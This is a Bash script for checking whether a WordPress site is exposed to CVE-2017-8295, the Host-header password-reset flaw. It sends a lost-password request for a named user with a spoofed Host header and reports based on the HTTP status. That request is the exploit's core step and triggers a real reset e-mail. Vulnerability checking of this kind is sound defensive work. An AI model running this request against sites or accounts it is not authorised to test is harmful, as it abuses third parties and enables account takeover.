Simple Bash script to test against https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html.
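#!/usr/bin/env bash
#
# Check a WordPress domain against CVE-2017-8295.
# https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html
#
# Usage:
#   ./wordpress-host-check <domain> <username>
#
#   <domain>
#     The WordPress domain you wish to check. For example, http://example.com.
#
#   <username>
#     The WordPress username you wish to attempt a password reset for.
#
# How the check works:
#   The script POSTs the lost-password form with the Host header overridden
#   to a fixed placeholder value and looks at the HTTP status code only.
#   A 302 means the request was processed and redirected; a site that
#   rejects or ignores requests carrying a foreign Host header returns
#   something else.
#
# Limits of the result:
#   - The status code is a heuristic. It does not show which hostname ended
#     up in the reset e-mail, so a 302 should be confirmed by inspecting the
#     headers of the message that was sent.
#   - When the request is processed, WordPress sends a real password-reset
#     e-mail to the account, so the run is visible to that user.
#   - A 302 can presumably also come from an unrelated redirect (for example
#     a canonical-URL rule); verify before treating it as a finding.
#   - On Apache, pinning the server name (UseCanonicalName On with an
#     explicit ServerName) is the usual hardening for this class of
#     Host-header issue.
#
# Exit status:
#   0  a verdict was printed
#   1  no HTTP response was obtained, result inconclusive
#   2  usage error
#
# Author: Steve Grunwell (https://stevegrunwell.com)
# Link: https://stevegrunwell.com/blog/keeping-wordpress-secure/
# License: MIT

set -u

# Both arguments are required; without them the request would go to a
# malformed URL and the failure would be reported as "safe".
if [[ $# -ne 2 || -z "$1" || -z "$2" ]]; then
  printf 'Usage: %s <domain> <username>\n' "${0##*/}" >&2
  exit 2
fi

# Drop one trailing slash so the URL does not contain "//wp-login.php".
site=${1%/}
user=$2

# Placeholder hostname sent instead of the site's own name.
readonly SPOOFED_HOST='example.com'

printf "\nAttempting to reset the password for '%s' on %s:\n" "$user" "$site"

# --data-urlencode keeps usernames containing spaces, '&' or '=' from being
# split by the shell or misparsed as extra form fields.
curl_status=0
RESPONSE=$(curl --write-out '%{http_code}' --silent --output /dev/null \
  --max-time 30 \
  -X POST "$site/wp-login.php?action=lostpassword" \
  -H 'cache-control: no-cache' \
  -H 'content-type: application/x-www-form-urlencoded' \
  -H "host: $SPOOFED_HOST" \
  -H "origin: $site" \
  -H "referer: $site/wp-login.php?action=lostpassword" \
  --data-urlencode "user_login=$user") || curl_status=$?

# curl prints 000 when it never received an HTTP response (DNS failure,
# refused connection, TLS error, timeout). That says nothing about the site,
# so it must not be reported as "safe".
if [[ "$curl_status" -ne 0 || "$RESPONSE" == "000" ]]; then
  printf '> No usable HTTP response from %s (curl exit status %s); the result is inconclusive.\n\n' \
    "$site" "$curl_status" >&2
  exit 1
fi

# A 302 response indicates the user was redirected to the confirmation screen.
if [[ "$RESPONSE" == "302" ]]; then
  printf '> Uh oh, it appears that %s may be vulnerable!\n\n' "$site"
else
  printf '> Good news! %s appears to be safe from this exploit.\n\n' "$site"
fi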